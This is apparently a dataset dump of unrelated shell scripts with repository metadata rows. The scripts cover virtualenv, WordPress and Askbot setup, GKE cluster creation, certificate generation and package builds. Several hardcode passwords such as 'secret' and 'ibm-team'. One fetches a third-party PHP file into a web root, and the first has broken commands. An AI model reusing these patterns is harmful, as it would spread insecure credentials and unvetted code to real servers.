sudo chmod 755 /usr/local/penv27
# 4) 基于现有的 python2.7 环境,重新再/usr/local/penv27 目录下安装一套新的python2.7,pip2.7环境
sudo virtualenv penv2.7 --python=/usr/local/penv2.7/bin/python2.7
#New python executable in /usr/local/penv27/bin/python2.7
#Also creating executable in /usr/local/penv27/bin/python
#Installing setuptools, pip, wheel...done.
# 5) 激活虚拟环境 并查看 pip 版本 Ctrl+D 退出
source /usr/local/penv2.7/bin/activate
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ pip --version
#pip 18.0 from /usr/local/penv27/lib/python2.7/site-packages/pip (python 2.7)
#(penv27) [huhao1@bi-infoc-txygz3-2 penv27]$ exit()
# 6)配置别名
sudo vim /etc/profile
alias python2.7="/usr/local/penv27/bin/python2.7"
alias pip2.7="/usr/local/penv27/bin/pip2.7"
source /etc/profile
# 7)测试 (大功告成)
#pip2.7 install flask
# Downloading https://files.pythonhosted.org/packages/00/a4/cd587b2b19f043b65bf33ceda2f6e4e6cdbd0ce18d01a52b9559781b1da6/Flask-Script-2.0.6.tar.gz (43kB)
# 100% |████████████████████████████████| 51kB 138kB/s
#Collecting Flask (from flask-script)
# 8) pip 批量安装依赖
# 自动将项目使用到的依赖,记录到指定文件
pip freeze requirements.txt
# 安装依赖清单,恢复环境
pip install -r equirements.txt
| true
|
de778ac85d23434ea9b6aea1e1ec95e8faa6c95a
|
Shell
|
RaoKarter/manifold_0_12_ei
|
/manifold-ipa/code/simulator/SPXQsim/run.sh
|
UTF-8
| 492
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
TESTBENCH=`ls ./benchmarks3/`
trap 'exit 1' 1 2 15
#export LD_LIBRARY_PATH=$QSIM_PREFIX/lib
export QSIM_PREFIX=/home/hugh/Project/HARDWARE/ME/local_install/qsim-root
export LD_LIBRARY_PATH=/home/hugh/Project/HARDWARE/ME/local_install/qsim-root/lib
mkdir -p results
for testcase in $TESTBENCH; do
echo $testcase
./smp_llp_con_dvfs conf_llp.cfg.bst.ss outorder.config.ss qsim_lib state.16 16core_ooo.config.ss ./benchmarks/$testcase >./results/$testcase.best.log 2>&1
done
| true
|
e54ac171123ca3071580208488e6c44a20e7f02e
|
Shell
|
baconslayer/commons
|
/calc_checkout/checkout-support/checkoutServer.sh
|
UTF-8
| 1,593
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
CHECKOUT_DIR=./calc_checkout
TEST_CONNECTIONS_SCRIPT=./testConnections.sh
. ./main.functions
. ./parse.args.functions
. ./file.functions
. ./config.entry.functions
. ./test.connection.functions
function validateServer()
{
echo ""
echo "Validating Server Deployment for $APPNAME on $(host -t RP $(hostname))"
validateByInputFile ../conf/common.file.data
validateByInputFile ../conf/server.file.data
if [ -f ../conf/$APPNAME.server.file.data ]; then
validateByInputFile ../conf/$APPNAME.server.file.data
fi
echo ""
}
function howToUse()
{
echo "$0"
echo " -appname [wfsm-app|wfsmcc-app]"
echo " -serverClass ecom"
echo " -level [level1|level2|level3|level4|level5|test|prod]"
echo " -verbose"
echo " -site [a|b]"
echo " "
echo "Example for L1 non Credit Card Cluster:"
echo "$0 -serverClass ecom -level level1 -site a"
}
########
######## MAIN
########
if [ $# -eq 0 ]; then
howToUse
exit
else
parse_line_arguments $@
fi
if [ -z "$APPNAME" -o -z "$SERVER_CLASS" -o -z "$LEVEL" ]; then
echo "Missing arguments."
echo "appname=$APPNAME serverClass=$SERVER_CLASS level=$LEVEL site=$SITE"
howToUse
exit
fi
if [ "$VERBOSE" = "TRUE" ]; then
echo "appname=$APPNAME serverClass=$SERVER_CLASS level=$LEVEL site=$SITE"
fi
echo "------------------------------------------------------------"
hostname=$(host -t RP $(hostname) | cut -d ' ' -f 6 | sed -e 's/\.$//')
validateServer
echo "------------------------------------------------------------"
# end of script
| true
|
1b9c2e46efdb93af9855643234d6c9baf3029adb
|
Shell
|
bakerwm/test_perl
|
/old_versions/create_mapping_results.sh
|
UTF-8
| 5,827
| 2.609375
| 3
|
[] |
no_license
|
From Clean fasta to soap & match_genome
1. Soap >> (Bi server, 1 cpu for each job)
(1) 45SE & 81SE: -M 0 -r 2 -v 0 -p 1
example: soap -a clean.fa -D NC_000962.fna.index -o Rv_45SE.soap -u Rv_45SE.unmap -M 0 -r 2 -v 0 -p 1
(2) 90PE: -m2 -r 2 -v 2 -p 1 -x 1000 -s 40 -l 32 -o out.soapPE -2 out.soapSingle
example: soap -a Rv_1.fq -b Rv_2.fq -D NC_000962.fna.index -o Rv_200PE.soap -2 Rv_200PE.soapSingle -m2 -r 2 -v 2 -p 1 -x 1000 -s 40 -l 32
2. Trans Soap:
(1) match_genome.txt [7-line tab-delimited file]: <tag_id> <genome_id> <begin> <end> <strand> <sequence> <exp>
a. SE soap:
"soap2txt_v1.pl"
usage: soap2txt_v1.pl clean.fa *.soap
b. PE soap:
"soapPE2SE.pl"
usage:
merge.pl Rv_L1.PESoap 1>Rv_L1_genome.txt 2>length_vs_number_Rv_L1_genome.txt
(2) coverage [3-line tab-delimited file]: <genome_id> <position> <coverage>
"soap.coverage"
usage: soap.coverage -cvg -i *.soap -refsingle H37Rv.fna -o result.txt -depthsingle H37Rv_45SE.cov
"CovTrans.pl"
Usage: perl CovTrans.pl in.cov result.out Genome_fna out.coverage
Note:
1. Infile is the result from soap.coverage -depthsingle
2. Length is the result from soap.coverage -o
3. The genome fasta file used for soap
4. The result file
3. Get seed sequence:
(1) get seed sequence from coverage file.
"get_lncRNA_v2.pl"
usage: perl get_lncRNA_v2.pl -i coverage -s strand -c cutoff -o outfile
Options:
-i <file> : coverage file, 3-line tab-delimited file in the following format:
<Genome_ID> <Position> <Coverage>
Position should be continuous from 1 to end.
-s [+/-] : The strand.
-c [0-1] : The cutoff [0-1] to determin the edge. Default 0.5 .
-o <file> : The result file.
(2) Format transformation.\
"getPosition.pl"
Usage: perl /home/wangming/work/bin/get_sRNA/getPosition.pl infile gff strain_id > outfile
Note:
-1 : The input file in the following format:
<ID> <Strand> <Begin:Cov> <Max:Cov> <End:Cov>
-2 : The GFF file. GFF3 recommend.
-3 : The Strain name, help to recognize the GFF file.
Example: perl getPosition.pl H37Rv_45SE.temp NC_000962.gff H37Rv >H37Rv_45SE_lncRNA.txt
(3) Calculate rpkm in each library.
"?"
...
(4) Merge sRNA files from different libraries.
"merge4all.pl"
Usage: perl merge4all.pl -n 4 -i in_1,in_2,in_3,in_4 -o outfile
Options:
-n <Integer> :the number of input files
-i <file> :input files
-o <file> :output file
-h :show this help
Note: For multiple input files,
1. Filename like this, "45SE_H37Rv_*". eg: 45SE_H37Rv.txt
2. Multiple input filenames join by comma ",". eg: "infile_1,infile_2"
Description:
1. Two sequences have an overlap longer than 1/2 of one of the
sequence or longer than 20 nt will merge into a new one.
(match_length > 1/2 of input or 20 nt)
2. The expression level between sequences should not more than
100-fold.
(Max_exp/exp <= 100)
(5) RNA classification.
"sort2candi_v1.pl"
Usage: perl sort2candi_v1.pl infile
Note: the rules to select sRNA
1. at IGR or AS.
2. >=100 bp from 5' ORF and >=60 bp from 3' ORF.
==========================================================================================
End of file
==========================================================================================
>> Used command lines.
#command lines.
From rpkm.txt to merge lncRNA.txt.
get_work_shell.pl
[getPosition.pl, get_sRNA_sh.pl sort2candi_v1.pl sort2temp.pl]
From FastA files to rpkm.txt.
From match_genome to mapping.
(1)
Cal_sRNA_end.pl
getRscript.pl
Rscript *.R
(2)
Cal_sRNA_end.pl
match_v2.pl
getRscript_v2.pl
Rscript *.R
perl ~/work/bin/merge.pl 200PE_rpkm.txt 140PE_rpkm.txt 81SE_rpkm.txt 45SE_rpkm.txt >merge.txt
perl ~/work/bin/pick_merge_sRNA.pl merge.txt >merge.temp
perl ~/work/bin/getPosition.pl NC_000962.gff merge.temp >merge_lncRNA.txt
perl ~/work/bin/sort2candi_v3.pl merge_lncRNA.txt
# check reads mapping coverage on each mRNA.
Declaration:
1. Prepare samples.
2. Change file name.
3. Confirm parameters.
Step 1. Clean fasta file.
1. SOAP or BWA or Bowtie
2. match_genome.txt
3. Poscoverage.txt
4. Match genome/mRNA statment.
Step 2. Get sRNAs.
1. Statistic poscoverage, 5', 3' and read.
2. Merge different libraries. Twice.
3. Get position.
4. Find sRNAs.
Process:
1. Begin with:
a. match_genome.txt files,
b. Genome annotation files: GFF, fna,
2. make dir for match_genome and annotation files.
$ mkdir H37Rv_match_genome/ database/ # change file name to "match_genome.45SE.txt";
$ perl run_statPoscov.pl H37Rv_match_genome/
"45SE"_3end.mapping.txt
3. Merge sRNAs from different libraries.
$ perl merge4all -n 4 -i files,files -o outfile
$ perl sort2temp.pl outfile
$ perl getPosition GFF outfile.temp
$ perl sort2candi_v3.pl outfile.txt
Step 3. Statistic sRNAs mapping tRNA/rRNA/pub_RNA...
a. draw input file coverage map.
$ mkdir mRNA_maps
$ ln -s genome_mapping.txt ./
$ perl stat3end.pl
$ perl stat5end.pl
$ perl statPoscov.pl
$ perl creat_title_dir.pl
$ perl getRscript.pl
$ Rscript *R
b. draw sRNAs mapping input files.
$ perl mkdir mRNA_match_sRNA
$ perl match.pl sRNAs inputfile
$ perl stat3end.pl
$ perl stat5end.pl
$ perl statPoscvo.pl
$ perl creat_title_dir.pl
$ perl getRscript_v2.pl infile total_line total_seed
$ Rscript input2pdf.R
rm di
Step 4. Summary
1. Match genome/mRNA/rRNA/tRNA/IGR/AS/ statment.
2. sRNA output.
3. Draw figures: match mRNA/rRNA/tRNA...
| true
|
7402794500c0abfd361f088e6c900d098204be2d
|
Shell
|
shudhanshh/gcp-terraform-infra
|
/xyz-Dev-Project/create-cluster.sh
|
UTF-8
| 2,388
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Create cluster zonal cluster in standard mode with premptible node in us-east1-a zone with two node pools
# One node pool is default and the other one with premptible vm
# Used below gcloud command which will create a new cluster
#Setting environment variable
PROJECT_ID="xyz-dev-freelance"
ENV="dev"
REGION="us-east1"
ZONE="us-east1-b"
PREFIX="xyz"
CLUSTER_NAME="${PREFIX}-${ENV}-cluster"
MACHINE_TYPE="n2-standard-2"
NETWORK="default"
echo $PROJECT_ID
echo $ENV
echo $REGION
echo $ZONE
echo $PREFIX
echo $CLUSTER_NAME
echo $MACHINE_TYPE
echo $NETWORK
gcloud config set project $PROJECT_ID
gcloud config set compute/region $REGION
gcloud beta container --project $PROJECT_ID clusters create $CLUSTER_NAME \
--zone $ZONE --no-enable-basic-auth --cluster-version "1.19.9-gke.1400" --release-channel "regular" \
--machine-type $MACHINE_TYPE --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" \
--metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/cloud-platform" \
--preemptible --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias \
--network "projects/xyz-dev-freelance/global/networks/default" \
--subnetwork "projects/xyz-dev-freelance/regions/us-east1/subnetworks/default" \
--no-enable-intra-node-visibility --default-max-pods-per-node "110" --enable-autoscaling \
--min-nodes "3" --max-nodes "6" --no-enable-master-authorized-networks \
--enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 \
--enable-autoprovisioning --min-cpu 1 --max-cpu 1 --min-memory 1 --max-memory 1 \
--autoprovisioning-scopes=https://www.googleapis.com/auth/cloud-platform --enable-autoprovisioning-autorepair \
--enable-autoprovisioning-autoupgrade --autoprovisioning-max-surge-upgrade 1 --autoprovisioning-max-unavailable-upgrade 0 \
--node-locations $ZONE && gcloud beta container \
--project $PROJECT_ID node-pools create "default-node-pool" \
--cluster $CLUSTER_NAME --zone $ZONE --machine-type $MACHINE_TYPE \
--image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" \
--metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/cloud-platform" \
--num-nodes "1" --enable-autoscaling --min-nodes "1" --max-nodes "1" --enable-autoupgrade \
--enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --node-locations $ZONE
| true
|
b0ca21acadc1efbfe4fa32e9bf7efc3811726272
|
Shell
|
NSOPORTEDESARROLLO/nstools
|
/files/nstools/bin/cat_samba4
|
UTF-8
| 435
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/bash
NSTOOLS_PATH="/opt/nstools"
trap "exec $NSTOOLS_PATH/bin/cat_samba4" SIGINT
clear
. /opt/nstools/lib/header
echo "SAMBA4 (Active Directory) - Seleccione una opcion:
[1] - Usuarios
[2] - Grupos
[3] - Recursos Compartidos
[4] - Configuraciones Avanzadas
[r] - Regresar
"
read OPT
case $OPT in
r)
exec $NSTOOLS_PATH/bin/nstools_start
;;
*)
exec $NSTOOLS_PATH/bin/cat_samba4
;;
esac
| true
|
05ec3970a5a5847ce0580b0c3830dd03d4349b78
|
Shell
|
Fellepp/CloudComputing
|
/Task3/vectorSum/gpu_job.sh
|
UTF-8
| 754
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/sh
##
## Nombre del trabajo que se va a crear
##
#PBS -N gpu_job
##
## Cola donde se lanzará el trabajo
##
#PBS -q batch
##
## Se ha de solicitar la ejecución en uno de los nodos con GPU's instalada
##
#PBS -l nodes=verode10
##
## Tiempo máximo de ejecución del trabajo. El formato es HH:MM:SS.
##
#PBS -l walltime=01:00:00
##
## Se van a volcar a fichero tanto la salida estándar como la salida de errores
##
#PBS -k oe
# Se debe desactivar el cacheado de los kernel compilados
# pues se hace en el directorio ~/.nv/ComputeCache/ que usado
# por NFS no funciona debido a los bloqueos.
export CUDA_CACHE_DISABLE=1
# Se ha de indicar la ruta absoluta al programa a ejecutar
~/CUDA/vectorSum/vectorSum_gpu
~/CUDA/vectorSum/vectorSum_gpu_long
| true
|
c7c589338e229834ea818eef32e2f504542e7496
|
Shell
|
xnandor/cees
|
/volumes/host/askbot.sh
|
UTF-8
| 4,490
| 3.078125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -e
##################OPTIONAL INPUT PARAMATERS VIA ENVIRONMENT
# ASKBOT_ROOT
# ASKBOT_DB_HOST
# ASKBOT_DB_PORT
# ASKBOT_DB_TYPE
# ASKBOT_DB_USERNAME
# ASKBOT_DB_PASSWORD
apt-get --assume-yes update
# apt-get --assume-yes install python-mysqldb
# apt-get --assume-yes install binutils libproj-dev gdal-bin
# apt-get --assume-yes install python-pip python-dev libpq-dev postgresql postgresql-contrib
# apt-get --assume-yes install postgresql postgresql-contrib
apt-get --assume-yes install libpq-dev
apt-get --assume-yes install python-psycopg2
# pip install psycopg2
/host/wait-for-it.sh askbot-postgres-db:5432;
ROOT='askbot/';
DB_HOST='db'
DB_PORT='5432'
DB_TYPE='postgresql_psycopg2'
DB_USERNAME='postgres';
DB_PASSWORD='password';
function settingsFromEnvironment() {
SETTING=$ASKBOT_ROOT
if [ -n $SETTING ]; then
ROOT=$SETTING
fi
SETTING=$ASKBOT_DB_HOST
if [ -n $SETTING ]; then
DB_HOST=$SETTING
fi
SETTING=$ASKBOT_DB_PORT
if [ -n $SETTING ]; then
DB_PORT=$SETTING
fi
SETTING=$ASKBOT_DB_TYPE
if [ -n $SETTING ]; then
DB_TYPE=$SETTING
fi
SETTING=$ASKBOT_DB_USERNAME
if [ -n $SETTING ]; then
DB_USERNAME=$SETTING
fi
SETTING=$ASKBOT_DB_PASSWORD
if [ -n $SETTING ]; then
DB_PASSWORD=$SETTING
fi
}
function changeSettings() {
settingsFromEnvironment;
# DEBUG
SUB_OLD="DEBUG = False"
SUB_NEW="DEBUG = False"
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# uWSGI IP
SUB_OLD="0.0.0.0"
SUB_NEW="askbot"
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/deploy/uwsgi.ini
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# uWSGI STATIC MAP
SUB_OLD="0.0.0.0"
SUB_NEW="askbot"
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/deploy/uwsgi.ini
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# uWSGI PROTO PORT
SUB_OLD="bin/uwsgi "
SUB_NEW="bin/uwsgi --socket :8888 "
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/deploy/run.sh
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# uWSGI MEDIA MAP
SUB_OLD="/m="
SUB_NEW="/askbot/m="
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/deploy/uwsgi.ini
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# ROOT
SUB_OLD="ASKBOT_URL = ''"
SUB_NEW="ASKBOT_URL = '$ROOT'"
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# STATIC
SUB_OLD="STATIC_URL = '/m/'"
SUB_NEW="STATIC_URL = '/askbot/m/'"
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# MEDIA
SUB_OLD="MEDIA_URL = '/upfiles/'"
SUB_NEW="MEDIA_URL = '/askbot/upfiles/'"
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# NAME
SUB_OLD="'NAME': '/data/askbot.db',"
SUB_NEW="'NAME': 'askbot',"
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# DB_HOST
SUB_OLD="'HOST': ''"
SUB_NEW="'HOST': '$DB_HOST'"
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# DB_PORT
SUB_OLD="'PORT': ''"
SUB_NEW="'PORT': '$DB_PORT'"
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# DB_TYPE
SUB_OLD="'django.db.backends.sqlite3'"
SUB_NEW="'django.db.backends.$DB_TYPE'"
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# DB_USERNAME
SUB_OLD="'USER': ''"
SUB_NEW="'USER': '$DB_USERNAME'"
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# DB_PASSWORD
SUB_OLD="'PASSWORD': ''"
SUB_NEW="'PASSWORD': '$DB_PASSWORD'"
sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
# # DB SYNC
# SUB_OLD="python /app/manage.py migrate --noinput"
# SUB_NEW="python manage.py makemigrations askbot\npython /app/manage.py migrate --noinput"
# sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/deploy/run.sh
# echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
}
#### DO NO MATTER WHAT
changeSettings;
#### NO CMD(s)
if [ "$#" -eq 0 ]; then
echo "Running /app/deploy/run.sh"
/app/deploy/run.sh
fi
#### CMD(s)
echo "Running '$@'"
exec "$@"
| true
|
83f70813c2b06c424909052d8804ca0ea37720c6
|
Shell
|
manaphys/dest
|
/install.sh
|
UTF-8
| 2,087
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash
#font: https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu
sudo apt-get update
#apache
sudo apt-get install apache2
sudo cp etc/apache2/apache2.conf /etc/apache2/apache2.conf
#apache test
##ifconfig eth0 | grep "inet " | awk '{ print $3 }'
##ifconfig eth1 | grep "inet " | awk '{ print $3 }'
#to change port, change this two files, and restart apache
##sudo vim /etc/apache2/ports.conf
##sudo vim /etc/apache2/sites-enabled/000-default.conf
#mysql
sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql
sudo mysql_install_db
sudo /usr/bin/mysql_secure_installation
#php
sudo apt-get install php5 libapache2-mod-php5 php5-mcrypt
sudo cp etc/apache2/mods-enabled/dir.conf /etc/apache2/mods-enabled/
#php test
##sudo cp var/www/html/info.php /var/www/html/
sudo service apache2 restart
#wordpress
sudo apt-get install php5-gd libssh2-php
mysql -uroot -psecret < home/dest/wordpress/wordpress-setup.sql
sudo cp home/dest/wordpress/wp-config.php /var/www/html
cd /tmp
wget http://wordpress.org/latest.tar.gz
tar xzvf latest.tar.gz
sudo rsync -avP /tmp/wordpress/ /var/www/html/
cd /var/www/html
sudo wget -c https://raw.githubusercontent.com/aidewind/aide/master/db.php
#do this guide to understand the demo user https://www.digitalocean.com/community/tutorials/initial-server-setup-with-ubuntu-14-04
##sudo chown -R demo:www-data *
mkdir /var/www/html/wp-content/uploads
sudo chown -R :www-data /var/www/html/wp-content/uploads
#open browser to finish up! or... =^)
##mysql -uroot -psecret < home/dest/wordpress/wordpress.sql
#to do : enable more cool permanlinks
##http://codex.wordpress.org/Changing_File_Permissions
##https://www.digitalocean.com/community/tutorials/how-to-set-up-mod_rewrite
#govpress theme
cd /var/www/html/wp-content/themes
wget -c https://downloads.wordpress.org/theme/govpress.1.3.0.zip
unzip govpress.1.3.0.zip
| true
|
8851ef5959c0ad75d591b4dec95b62ee95493120
|
Shell
|
mattt416/rpc-designate
|
/scripts/deploy.sh
|
UTF-8
| 2,038
| 2.890625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Copyright 2014-2017, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
## Shell Opts ----------------------------------------------------------------
set -e -u -x
set -o pipefail
export BASE_DIR=${BASE_DIR:-"/opt/rpc-openstack"}
source ${BASE_DIR}/scripts/functions.sh
export DESIGNATE_DEPLOY_OPS="-e @/opt/rpc-designate/playbooks/group_vars/designate_all.yml "
# Perform peliminary configurations for Designate
run_ansible /opt/rpc-designate/playbooks/setup-designate.yml
# ReBootstrap ansible to add the os_designate role to ansible
${BASE_DIR}/scripts/bootstrap-ansible.sh
cd /opt/rpc-openstack/openstack-ansible/playbooks/
# build container
run_ansible lxc-containers-create.yml --limit designate_all
run_ansible openstack-hosts-setup.yml --tags openstack_hosts-config
if [[ "${DEPLOY_AIO}" == "yes" ]]; then
run_ansible /opt/rpc-designate/playbooks/setup-bind.yml
export DESIGNATE_DEPLOY_OPS=${DESIGNATE_DEPLOY_OPS}"-e @/opt/rpc-designate/playbooks/files/aio/pools.yml.aio "
fi
# install designate
run_ansible ${DESIGNATE_DEPLOY_OPS} -e "designate_developer_mode=True" /opt/rpc-designate/playbooks/os-designate-install.yml
# add service to haproxy
run_ansible ${DESIGNATE_DEPLOY_OPS} haproxy-install.yml
# open ports for designate-mdns
run_ansible ${DESIGNATE_DEPLOY_OPS} /opt/rpc-designate/playbooks/setup-infra-firewall-mdns.yml
# add filebeat to service so we get logging
cd /opt/rpc-openstack/
run_ansible /opt/rpc-openstack/rpcd/playbooks/filebeat.yml --limit designate_all
| true
|
8ee8a6c5089d4a5f8680d740e1d78fbfb11b0e0c
|
Shell
|
kunihal96/asement
|
/flipcoin.sh
|
UTF-8
| 1,052
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash -x
head=1
tail=0
headcount=0
tailcount=0
for (( i=0;$i<10;i++ ))
do
check=$((RANDOM%2))
if (( $check == $head ))
then
echo "got head"
((headcount++))
else
echo "got tail"
((tailcount++))
fi
done
echo "head count: $headcount"
echo "tail count: $tailcount"
echo " "
if(( $headcount > $tailcount ))
then
diff=$(($headcount-$tailcount))
echo "diffrence is $diff for winning head"
elif(( $headcount < $tailcount ))
then
diff=$(($tailcount-$headcount))
echo "diffrence is $diff for winning tail"
else
echo "tie"
while (( 1 ))
do
check=$((RANDOM%2))
if (( $check == $head ))
then
echo "got head"
((headcount++))
else
echo "got tail"
((tailcount++))
fi
if (( $(($headcount-$tailcount)) ==2 ))
then
break;
elif (( $(($tailcount-$headcount)) ==2 ))
then
break;
fi
done
echo "head count: $headcount"
echo "tail count: $tailcount"
fi
| true
|
2b2ef4407971b09292a2bd3f175253bc28236253
|
Shell
|
img/makecerts
|
/make_server_certs.sh
|
UTF-8
| 2,026
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# Create a Device Certificate for each domain,
# such as example.com, *.example.com, awesome.example.com
# NOTE: You MUST match CN to the domain name or ip address you want to use
openssl genrsa \
-out all/privkey.pem \
2048
# Create a request from your Device, which your Root CA will sign
openssl req -new \
-config openssl.cnf \
-sha256 \
-key all/privkey.pem \
-out all/csr.pem
# Sign the request from Device with your Root CA
openssl x509 \
-req -in all/csr.pem \
-extfile openssl.cnf \
-extensions v3_req \
-sha256 \
-CA all/my-private-root-ca.cert.pem \
-CAkey all/my-private-root-ca.privkey.pem \
-CAcreateserial \
-out all/cert.pem \
-days 365
# covert the server certificate to der
#openssl x509 -outform der -in all/cert.pem -out all/cert.der
# Put things in their proper place
cp all/{privkey,cert}.pem server/
cat all/cert.pem > server/fullchain.pem # we have no intermediates in this case
cp all/my-private-root-ca.cert.pem server/
cp all/my-private-root-ca.cert.pem client/
# create DER format crt for iOS Mobile Safari, etc
#openssl x509 -outform der -in all/my-private-root-ca.cert.pem -out client/my-private-root-ca.crt
# add the certificate and private key into a p12
rm -f all/server.p12
openssl pkcs12 -export -in all/cert.pem -inkey all/privkey.pem -out all/ibm-team-ssl.p12 -name default -CAfile all/my-private-root-ca.cert.pem -caname root -passout pass:ibm-team
# needs to be oracle keytool - ibm one seems not to like this incantation
rm -f all/ibm-team-ssl.keystore
/cygdrive/c/Program\ Files/Java/jdk1.8.0_333/bin/keytool.exe -importkeystore -deststorepass ibm-team -destkeypass ibm-team -destkeystore all/ibm-team-ssl.keystore -srckeystore all/ibm-team-ssl.p12 -srcstoretype PKCS12 -srcstorepass ibm-team
#cp server/cert.pem /d/dev/gadget_server/certs/server/my-server.crt.pem
#cp server/privkey.pem /d/dev/gadget_server/certs/server/my-server.key.pem
#cp server/my-private-root-ca.cert.pem /d/dev/gadget_server/certs/ca/my-root-ca.crt.pem
| true
|
2e9a751576513353efb427606d115f8c7e76a118
|
Shell
|
scalableminds/time-tracker
|
/build/build.sh
|
UTF-8
| 3,463
| 3.984375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
: ${BUILD_NUMBER:?"Need non empty BUILD_NUMBER variable! If you are starting this script from cli you should use build-cli.sh"}
: ${JOB_NAME:?"Need non empty JOB_NAME variable"}
SCRIPT_DIR=$(dirname $0)
export WORKSPACE=${WORKSPACE:-$(readlink -f ${SCRIPT_DIR}/..)}
if [ `python2 -c "import jinja2"` ]; then
echo "This scrips needs jinja2 for template rendering, aborting ..."
exit 1
fi
REAL_BRANCH_FILE=${WORKSPACE}/.git/REAL_BRANCH
if [ -f ${REAL_BRANCH_FILE} ]; then
GIT_BRANCH=$(<${REAL_BRANCH_FILE})
elif [ -z "$GIT_BRANCH" ]; then
echo "Need either a $REAL_BRANCH_FILE containing branch or GIT_BRANCH environment variable"
exit 1
fi
export NAME=${JOB_NAME}-${GIT_BRANCH}
export ROOT_ENV=$WORKSPACE/root_env
export INSTALL_DIR=/usr/lib/$NAME
export PID_DIR=/var/run/$NAME
export LOG_DIR=/var/log/$NAME
export PORT=12000
export MODE=prod
export VERSION=1.0
stage() {
echo "[*] compiling..."
cd $WORKSPACE
bower install
sbt clean compile stage
}
createRootEnvironment() {
echo "[*] creating root environment..."
cd $WORKSPACE
if [ -d ${ROOT_ENV} ]; then
rm -rf ${ROOT_ENV}
elif [ -e ${ROOT_ENV} ]; then
echo "Root Environment $ROOT_ENV exists, but is not a directory, aborting..."
return 1
fi
mkdir ${ROOT_ENV}
}
copyBinariesToRootEnvironment(){
echo "[*] copying binary files..."
INSTALL_DIR_PATH=${ROOT_ENV}${INSTALL_DIR}
mkdir -p $INSTALL_DIR_PATH
cp -r $WORKSPACE/target/universal/stage/* $INSTALL_DIR_PATH
}
renderTemplate() {
TEMPLATE_CONTENT=$(< $1)
python2 -c "import jinja2; print jinja2.Template(\"\"\"$TEMPLATE_CONTENT\"\"\").render(\
name=\"$NAME\", project=\"$JOB_NAME\", branch=\"$GIT_BRANCH\", mode=\"$MODE\", port=\"$PORT\", \
install_dir=\"$INSTALL_DIR\", pid_dir=\"$PID_DIR\", log_dir=\"$LOG_DIR\")"
}
makeInitScriptExecutable() {
#A more general approach to setting modi on files could be a suffix such as ".x" for "add executable flag", so far it's not nesseccary though
chmod +x $ROOT_ENV/etc/init.d/$NAME
chmod +x ${ROOT_ENV}${INSTALL_DIR}/bin/time-tracker
}
renderAllTemplates() {
TEMPLATES=$(find $WORKSPACE/build/templates -type f)
while read -r TEMPLATE; do
TEMPLATE_PATH=${TEMPLATE#*/templates/}
TARGET_PATH=${TEMPLATE_PATH//-BRANCH/-$GIT_BRANCH}
echo "[*] rendering template $TARGET_PATH"
mkdir -p `dirname $ROOT_ENV/$TARGET_PATH`
renderTemplate $TEMPLATE > $ROOT_ENV/$TARGET_PATH
done <<< $TEMPLATES
}
buildPackage() {
echo "[*] creating package"
DIRS=`ls -x $ROOT_ENV`
INSTALL_SCRIPT_DIR=${WORKSPACE}/build/install_scripts
cd $WORKSPACE
fpm -m thomas@scm.io -s dir -t deb \
-n ${NAME} \
